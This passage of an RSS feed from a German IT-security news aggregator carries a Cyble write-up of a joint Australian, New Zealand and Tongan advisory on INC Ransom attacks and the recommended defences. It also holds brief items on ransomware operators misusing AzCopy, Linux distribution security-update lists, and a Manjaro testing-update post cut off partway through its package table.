<p><a href="https://cyble.com/en-au/demo/" target="_blank" rel="noreferrer noopener"><strong>Schedule a demo</strong></a> with Cyble to see how its <a href="https://cyble.com/en-au/cyber-threat-intelligence-solution-for-australia/" target="_blank" rel="noreferrer noopener">threat intelligence platform</a> supports ransomware detection and response. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading"><strong>References:</strong></h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><a href="https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/inc-ransom-affiliate-model-enabling-targeting-of-critical-networks" target="_blank" rel="noreferrer noopener">https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/inc-ransom-affiliate-model-enabling-targeting-of-critical-networks</a> </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><a href="https://www.cyber.gov.au/about-us/view-all-content/news/inc-ransom-and-affiliate-network-operating-in-australia-new-zealand-and-the-pacific-island-states" target="_blank" rel="noreferrer noopener">https://www.cyber.gov.au/about-us/view-all-content/news/inc-ransom-and-affiliate-network-operating-in-australia-new-zealand-and-the-pacific-island-states</a> </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p>The post <a rel="nofollow" href="https://cyble.com/inc-ransom-attacks-australia-new-zealand/">Australia, New Zealand, Tonga, Warn of Rising INC Ransom Attacks Targeting Pacific Networks</a> appeared first on <a rel="nofollow" href="https://cyble.com/">Cyble</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Australia, New Zealand, Tonga, Warn of Rising INC Ransom Attacks Targeting Pacific Networks]]></title>
<description><![CDATA[Cybersecurity agencies across the Pacific region are sharing concerns about the ransomware group INC Ransom's expanding activities and the growing influence of its affiliate network.


A joint advisory issued by the Australian Cyber Security Centre (ACSC), National Computer Emergency Response Tea...]]></description>
<link>https://tsecurity.de/de/3346319/it-security-nachrichten/australia-new-zealand-tonga-warn-of-rising-inc-ransom-attacks-targeting-pacific-networks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3346319/it-security-nachrichten/australia-new-zealand-tonga-warn-of-rising-inc-ransom-attacks-targeting-pacific-networks/</guid>
<pubDate>Fri, 13 Mar 2026 12:39:33 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="800" height="400" src="https://cyble.com/wp-content/uploads/2026/03/INC-Ransom.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="INC Ransom" decoding="async" srcset="https://cyble.com/wp-content/uploads/2026/03/INC-Ransom.webp 800w, https://cyble.com/wp-content/uploads/2026/03/INC-Ransom-300x150.webp 300w, https://cyble.com/wp-content/uploads/2026/03/INC-Ransom-768x384.webp 768w, https://cyble.com/wp-content/uploads/2026/03/INC-Ransom-600x300.webp 600w" sizes="(max-width: 800px) 100vw, 800px" title="Australia, New Zealand, Tonga, Warn of Rising INC Ransom Attacks Targeting Pacific Networks 2"></p>
<p><!-- wp:paragraph --></p>
<p>Cybersecurity agencies across the Pacific region are sharing concerns about the ransomware group INC Ransom's expanding activities and the growing influence of its affiliate network.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>A joint advisory issued by the Australian Cyber Security Centre (ACSC), National Computer Emergency Response Team Tonga (CERT Tonga), and the New Zealand National Cyber Security Centre (NCSC) highlights how the INC Ransom ecosystem has become an active threat to organizations in Australia, New Zealand, and Pacific Island states.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The advisory from the agencies down under is designed for both technical specialists and general network defenders. It outlines how INC Ransom operates, the techniques its affiliates use, and the steps organizations can take to reduce their exposure. Officials from the three agencies are urging both government ministries and private organizations to review the mitigation measures outlined in the guidance to strengthen defenses against INC Ransom activity.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>What distinguishes this campaign is not only the <a href="https://cyble.com/knowledge-hub/what-is-ransomware/" target="_blank" rel="noreferrer noopener">ransomware</a> itself, but the operational structure behind it. The INC Ransom ecosystem relies on a distributed affiliate model, enabling a broad range of cybercriminal operators to conduct attacks using shared tools and infrastructure.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>The INC Ransom Affiliate Model and the RaaS Ecosystem</strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>The operational structure of INC Ransom, which functions as a Ransomware-as-a-Service (RaaS) platform. The model allows external affiliates to deploy ransomware against victims while the core operators manage extortion negotiations and payment collection. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>INC Ransom first emerged in mid-2023 as a financially motivated cybercriminal group believed to be based in Russia. Since then, the group has built an affiliate network that distributes ransomware to attackers targeting organizations worldwide. Within this structure, affiliates perform the technical intrusion and deployment of the <a href="https://cyble.com/knowledge-hub/what-is-malware/" target="_blank" rel="noreferrer noopener">malware</a>, while the core INC Ransom operators handle victim communication and ransom demands. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The group is also known by other threat-intelligence labels, including Tarnished Scorpion and GOLD IONIC. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>According to the advisory from ACSC, NCSC, and CERT Tonga, INC Ransom operations are particularly focused on organizations that manage sensitive or high-value information. Health care providers have become a prominent target globally, likely due to the operational pressure these organizations face when systems become unavailable. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Although earlier activity concentrated on victims in the United States and the United Kingdom, <a href="https://cyble.com/en-au/cyber-threat-intelligence-solution-for-australia/" target="_blank" rel="noreferrer noopener">threat intelligence</a> collected by ACSC, NCSC, and CERT Tonga indicates that the group has shifted attention toward the Pacific region since early 2025. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>INC Ransom Incidents in Australia</strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>In Australia, ACSC has tracked a series of incidents linked to INC Ransom affiliates. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Between 1 July 2024 and 31 December 2025, the ACSC responded to 11 incidents attributed to the ransomware operation. These incidents primarily affected organizations in professional services and the health care sector. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Since January 2025, analysts at the ACSC have observed INC Ransom affiliates targeting <a href="https://cyble.com/blog/australia-health-cyber-sharing-network/" target="_blank" rel="noreferrer noopener">Australian health care</a> entities through compromised user accounts. Once access is obtained, attackers typically escalate privileges by creating new administrator-level accounts. They then move laterally through internal systems to expand control within the network. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>During these operations, INC Ransom affiliates have deployed malicious payloads using filenames such as “win.exe.” Investigations conducted by the ACSC have also identified cases in which attackers exfiltrated personally identifiable information and medical records before launching the encryption phase. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Victims typically discover ransom notes containing instructions and links to the INC Ransom Tor-based data leak site (DLS) where negotiations occur. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Health Infrastructure Disruption in Tonga</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>One of the most disruptive incidents linked to INC Ransom occurred in the Kingdom of Tonga. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>On 15 June 2025, the ICT environment of the Tongan Ministry of Health was hit by a ransomware attack that disrupted the national health care network and rendered several core services inaccessible. Investigators from CERT Tonga, working with regional partners including ACSC and NCSC, discovered a ransom note associated with INC Ransom embedded within the ministry’s file systems. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>On 26 June 2025, the INC Ransom group publicly claimed responsibility for the incident on its <a href="https://cyble.com/knowledge-hub/what-is-the-dark-web/" target="_blank" rel="noreferrer noopener">dark-web</a> data leak site. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The advisory further identifies Roman Khubov, a cybercriminal also known as “blackod,” as the individual controlling the malicious infrastructure used to exfiltrate data during the Ministry of Health breach. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Ransomware Incident in New Zealand</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Ransomware activity remains a persistent problem in New Zealand, where multiple sectors of the economy have experienced disruptions. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>In May 2025, the NCSC received a report from a health-sector organization that had suffered a major ransomware intrusion. According to the notification, attackers encrypted a large number of servers and endpoint devices while also stealing significant volumes of data. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The NCSC investigation determined that INC Ransom was responsible for the incident. After the organization refused to meet the extortion demand, the attackers published the stolen dataset on the INC Ransom data leak site. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The event reinforced concerns among cybersecurity officials at NCSC, ACSC, and CERT Tonga that the group’s tactics are targeting organizations whose operations are highly sensitive to disruption. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Technical Tactics Used by INC Ransom</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Technical analysis from ACSC, NCSC, and CERT Tonga shows that INC Ransom affiliates rely on several common intrusion techniques to gain initial access to victim networks. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The most frequently observed entry points include: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Spear-phishing campaigns targeting employees </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Exploitation of unpatched internet-facing systems </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Purchased credentials from initial access brokers </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>Once inside the network, INC Ransom affiliates often rely on legitimate software tools rather than custom malware to perform key tasks. This tactic allows malicious activity to blend into normal administrative operations. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>For example: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>7-Zip and WinRAR are used to compress data before theft. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>The file synchronization tool rclone is frequently used to transfer stolen data outside the network. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>After data exfiltration, attackers deploy the encryption component of INC Ransom. A ransom note is then left on affected systems with payment instructions and contact details. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>If the targeted organization refuses to pay, INC Ransom operators initiate double-extortion tactics by publishing both the victim’s name and stolen information on the group’s leak site. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Security analysts note that the tactics, techniques, and procedures (TTPs) used by INC Ransom share similarities with other ransomware operations such as Lynx, Nemty, Nemty X, Karma, and Nokoyawa. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Defensive Measures Recommended by ACSC, NCSC, and CERT Tonga</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>The joint advisory from ACSC, NCSC, and CERT Tonga outlines several practical security measures designed to reduce the risk of INC Ransom compromise. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Key defensive actions include: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Maintain Reliable Backups:</strong> Organizations should maintain regular, tested backups of critical systems and store them securely to prevent unauthorized modification or deletion. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Restrict Network Traffic:</strong> Network administrators should limit inbound and outbound traffic to only what is necessary for operations. Firewalls and filtering technologies can help reduce exposure to <a href="https://cyble.com/knowledge-hub/what-is-phishing/" target="_blank" rel="noreferrer noopener">phishing</a> campaigns and malicious attachments. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Harden Remote Access:</strong> Virtual private networks (VPNs) and other remote access systems should be carefully configured to ensure only authorized users can reach sensitive resources. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Implement Multi-Factor Authentication:</strong> The advisory from ACSC, NCSC, and CERT Tonga emphasizes implementing phishing-resistant <a href="https://cyble.com/blog/multi-factor-authentication-mfa-is-a-part-of-your-cyber-hygiene/" target="_blank" rel="noreferrer noopener">multi-factor authentication</a> (MFA) for internet-facing services and privileged accounts. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Manage Privileged Access:</strong> Administrative privileges should be tightly controlled. Unique accounts for administrators improve accountability and reduce the impact of credential compromise. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Maintain Strong Vulnerability Management:</strong> Regular vulnerability scanning and rapid patching of exposed systems remain critical, particularly for internet-facing services that ransomware actors commonly target. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading"><strong>Growing Regional Collaboration Against the INC Ransom</strong> </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>The joint advisory reflects cooperation among cybersecurity agencies across the Pacific. By sharing intelligence and incident data, organizations such as ACSC, NCSC, and CERT Tonga are building a more coordinated response to ransomware threats like INC Ransom. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The rise of affiliate-driven ransomware operations has significantly lowered the barrier to entry for cybercriminal activity. In this environment, the INC Ransom ecosystem demonstrates how distributed attacker networks can rapidly shift focus across geographic regions. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>For organizations in Australia, New Zealand, and the Pacific islands, the advisory from the Australian Cyber Security Centre (ACSC), New Zealand National Cyber Security Centre (NCSC), and National Computer Emergency Response Team Tonga (CERT Tonga) highlights the need to strengthen access controls, monitor network activity, and maintain a tested <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-incident-response/" target="_blank" rel="noopener" title="What is Incident Response?" data-wpil-keyword-link="linked" data-wpil-monitor-id="29206">incident response plan</a> to limit the impact of ransomware attacks. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Threat intelligence from Cyble helps organizations track ransomware activity, monitor <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-the-dark-web/" target="_blank" rel="noopener" title="What is the Dark Web? 2026" data-wpil-keyword-link="linked" data-wpil-monitor-id="29208">dark web</a> exposure, and identify indicators of compromise earlier. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><a href="https://cyble.com/en-au/demo/" target="_blank" rel="noreferrer noopener"><strong>Schedule a demo</strong></a> with Cyble to see how its <a href="https://cyble.com/en-au/cyber-threat-intelligence-solution-for-australia/" target="_blank" rel="noreferrer noopener">threat intelligence platform</a> supports ransomware detection and response. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading"><strong>References:</strong></h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><a href="https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/inc-ransom-affiliate-model-enabling-targeting-of-critical-networks" target="_blank" rel="noreferrer noopener">https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/inc-ransom-affiliate-model-enabling-targeting-of-critical-networks</a> </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><a href="https://www.cyber.gov.au/about-us/view-all-content/news/inc-ransom-and-affiliate-network-operating-in-australia-new-zealand-and-the-pacific-island-states" target="_blank" rel="noreferrer noopener">https://www.cyber.gov.au/about-us/view-all-content/news/inc-ransom-and-affiliate-network-operating-in-australia-new-zealand-and-the-pacific-island-states</a> </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p>The post <a rel="nofollow" href="https://cyble.com/blog/inc-ransom-attacks-australia-new-zealand/">Australia, New Zealand, Tonga, Warn of Rising INC Ransom Attacks Targeting Pacific Networks</a> appeared first on <a rel="nofollow" href="https://cyble.com/">Cyble</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (kernel, kernel-rt, libvpx, nfs-utils, nginx:1.26, osbuild-composer, postgresql, postgresql:12, postgresql:13, postgresql:15, postgresql:16, and python-pyasn1), Debian (imagemagick), Fedora (perl-Crypt-SysRandom-XS and systemd), Mageia (yt-dlp), Orac...]]></description>
<link>https://tsecurity.de/de/3341344/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3341344/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 11 Mar 2026 14:22:18 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (kernel, kernel-rt, libvpx, nfs-utils, nginx:1.26, osbuild-composer, postgresql, postgresql:12, postgresql:13, postgresql:15, postgresql:16, and python-pyasn1), <b>Debian</b> (imagemagick), <b>Fedora</b> (perl-Crypt-SysRandom-XS and systemd), <b>Mageia</b> (yt-dlp), <b>Oracle</b> (delve, gimp, git-lfs, go-rpm-macros, image-builder, kernel, libpng, libvpx, mysql8.4, nfs-utils, osbuild-composer, postgresql16, postgresql:12, postgresql:13, postgresql:15, postgresql:16, python-pyasn1, python3, python3.12, python3.9, and thunderbird), <b>SUSE</b> (python-aiohttp, python-maturin, python311-pymongo, rclone, and util-linux), and <b>Ubuntu</b> (linux-nvidia, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, and python-geopandas).]]></content:encoded>
</item>
<item>
<title><![CDATA[AzCopy Misused In Active Ransomware Data Exfiltration Campaigns]]></title>
<description><![CDATA[In recent months, security researchers have observed a troubling trend: ransomware operators are exploiting a legitimate Azure tool, AzCopy, for data exfiltration in active campaigns. Traditionally, tools like Rclone and MegaSync have been associated with data theft. However, attackers are now pi...]]></description>
<link>https://tsecurity.de/de/3327833/it-security-nachrichten/azcopy-misused-in-active-ransomware-data-exfiltration-campaigns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3327833/it-security-nachrichten/azcopy-misused-in-active-ransomware-data-exfiltration-campaigns/</guid>
<pubDate>Thu, 05 Mar 2026 13:51:47 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In recent months, security researchers have observed a troubling trend: ransomware operators are exploiting a legitimate Azure tool, AzCopy, for data exfiltration in active campaigns. Traditionally, tools like Rclone and MegaSync have been associated with data theft. However, attackers are now pivoting to trusted, commonly used utilities. This shift highlights a new tactic in ransomware […]</p>
<p>The post <a href="https://cyberpress.org/azcopy-exploited-in-ransomware/">AzCopy Misused In Active Ransomware Data Exfiltration Campaigns</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AzCopy Utility Misused for Data Exfiltration in Ongoing Ransomware Attacks]]></title>
<description><![CDATA[Ransomware operators are increasingly abusing Microsoft’s trusted Azure data transfer utility, AzCopy, to quietly exfiltrate sensitive data before encryption, turning a routine cloud migration tool into a stealthy theft channel. Instead of relying on obviously malicious tools like Rclone or…
Read...]]></description>
<link>https://tsecurity.de/de/3324676/it-security-nachrichten/azcopy-utility-misused-for-data-exfiltration-in-ongoing-ransomware-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3324676/it-security-nachrichten/azcopy-utility-misused-for-data-exfiltration-in-ongoing-ransomware-attacks/</guid>
<pubDate>Wed, 04 Mar 2026 10:35:05 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Ransomware operators are increasingly abusing Microsoft’s trusted Azure data transfer utility, AzCopy, to quietly exfiltrate sensitive data before encryption, turning a routine cloud migration tool into a stealthy theft channel. Instead of relying on obviously malicious tools like Rclone or…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/azcopy-utility-misused-for-data-exfiltration-in-ongoing-ransomware-attacks/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/azcopy-utility-misused-for-data-exfiltration-in-ongoing-ransomware-attacks/">AzCopy Utility Misused for Data Exfiltration in Ongoing Ransomware Attacks</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (grafana), Debian (gegl, inetutils, libvpx, nova, and python-django), Fedora (azure-cli, chromium, microcode_ctl, python-azure-core, python3.14, and roundcubemail), Red Hat (grafana and osbuild-composer), SUSE (apptainer, dnsdist, istioctl, libsoup, ...]]></description>
<link>https://tsecurity.de/de/3300216/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3300216/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 20 Feb 2026 15:06:26 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (grafana), <b>Debian</b> (gegl, inetutils, libvpx, nova, and python-django), <b>Fedora</b> (azure-cli, chromium, microcode_ctl, python-azure-core, python3.14, and roundcubemail), <b>Red Hat</b> (grafana and osbuild-composer), <b>SUSE</b> (apptainer, dnsdist, istioctl, libsoup, openCryptoki, python-nltk, python311, python313, rclone, and thunderbird), and <b>Ubuntu</b> (libvpx, linux-azure, linux-azure-5.4, linux-azure-fips, and linux-intel-iotg).]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-01-31 - Kernels, Firefox, Cosmic]]></title>
<description><![CDATA[Hello community, here we have another set of package updates.
Current Promotions

Get the latest Gaming Laptop by Slimbook powered by Manjaro: Slimbook Manjaro III
Protect your personal data, keep yourself safe with Surfshark VPN: See current promotion

Recent News

KDE Plasma users with SDDM can...]]></description>
<link>https://tsecurity.de/de/3245290/unix-server/testing-update-2026-01-31-kernels-firefox-cosmic/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3245290/unix-server/testing-update-2026-01-31-kernels-firefox-cosmic/</guid>
<pubDate>Sat, 31 Jan 2026 09:46:40 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, here we have another set of package updates.</p>
<h3><a name="p-830245-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-830245-current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-830245-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-830245-recent-news-2"></a>Recent News</h2>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/testing-update-2026-01-31-kernels-firefox-cosmic/185261/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-01-31-kernels-firefox-cosmic/185261/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 stable and/or 6.12 LTS (Long Term Support).</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 stable and/or 6.12 LTS (Long Term Support).</li>
</ul>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2026-01-31-kernels-firefox-cosmic/185261/1">(click for more details)</a>
<h2><a name="p-830245-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-830245-notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li>Some <strong>Kernels</strong> got updated</li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/en-US/firefox/147.0.2/releasenotes/">147.0.2</a></li>
<li><strong>Cosmic</strong> <a href="https://www.neowin.net/news/cosmic-desktop-104-is-out-with-an-improved-greeter-better-performance-in-files-and-more/">1.0.4</a></li>
<li>Some fixes for <strong>GNOME</strong> and <strong>python</strong></li>
</ul>
<h2><a name="p-830245-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-830245-additional-info-4"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/testing-update-2026-01-31-kernels-firefox-cosmic/185261/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-01-31-kernels-firefox-cosmic/185261/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux510 5.10.248</li>
<li>linux515 5.15.198</li>
<li>linux61 6.1.161</li>
<li>linux66 6.6.122</li>
<li>linux612 6.12.68</li>
<li>linux618 6.18.8</li>
<li>linux619 6.19.0-rc7</li>
<li>linux61-rt 6.1.158_rt58</li>
<li>linux66-rt 6.6.116_rt66</li>
<li>linux612-rt 6.12.66_rt15</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (1/31/26 09:02 CET)</p>
<ul>
<li>testing core x86_64:  12 new and 12 removed package(s)</li>
<li>testing extra x86_64:  386 new and 495 removed package(s)</li>
<li>testing multilib x86_64:  6 new and 7 removed package(s)</li>
</ul>
<pre><code class="lang-auto">:: Different overlay package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20260128             20260131
-------------------------------------------------------------------------------
                            linux612            6.12.67-1            6.12.68-1
                    linux612-headers            6.12.67-1            6.12.68-1
                            linux618             6.18.7-1             6.18.8-1
                    linux618-headers             6.18.7-1             6.18.8-1
                             linux66            6.6.121-1            6.6.122-1
                     linux66-headers            6.6.121-1            6.6.122-1


:: Different sync package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20260128             20260131
-------------------------------------------------------------------------------
                                curl             8.18.0-2             8.18.0-3
                             gettext               0.26-1                1.0-1
                      libcurl-compat             8.18.0-2             8.18.0-3
                      libcurl-gnutls             8.18.0-2             8.18.0-3
                        libunistring                1.3-1              1.4.1-1
                           procps-ng              4.0.5-3              4.0.6-1


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20260128             20260131
-------------------------------------------------------------------------------
                             asusctl              6.3.1-1              6.3.2-1
                            chromium     144.0.7559.109-1                    -
                             firefox            147.0.2-1                    -
                    firefox-i18n-ach            147.0.2-1                    -
                     firefox-i18n-af            147.0.2-1                    -
                     firefox-i18n-an            147.0.2-1                    -
                     firefox-i18n-ar            147.0.2-1                    -
                    firefox-i18n-ast            147.0.2-1                    -
                     firefox-i18n-az            147.0.2-1                    -
                     firefox-i18n-be            147.0.2-1                    -
                     firefox-i18n-bg            147.0.2-1                    -
                     firefox-i18n-bn            147.0.2-1                    -
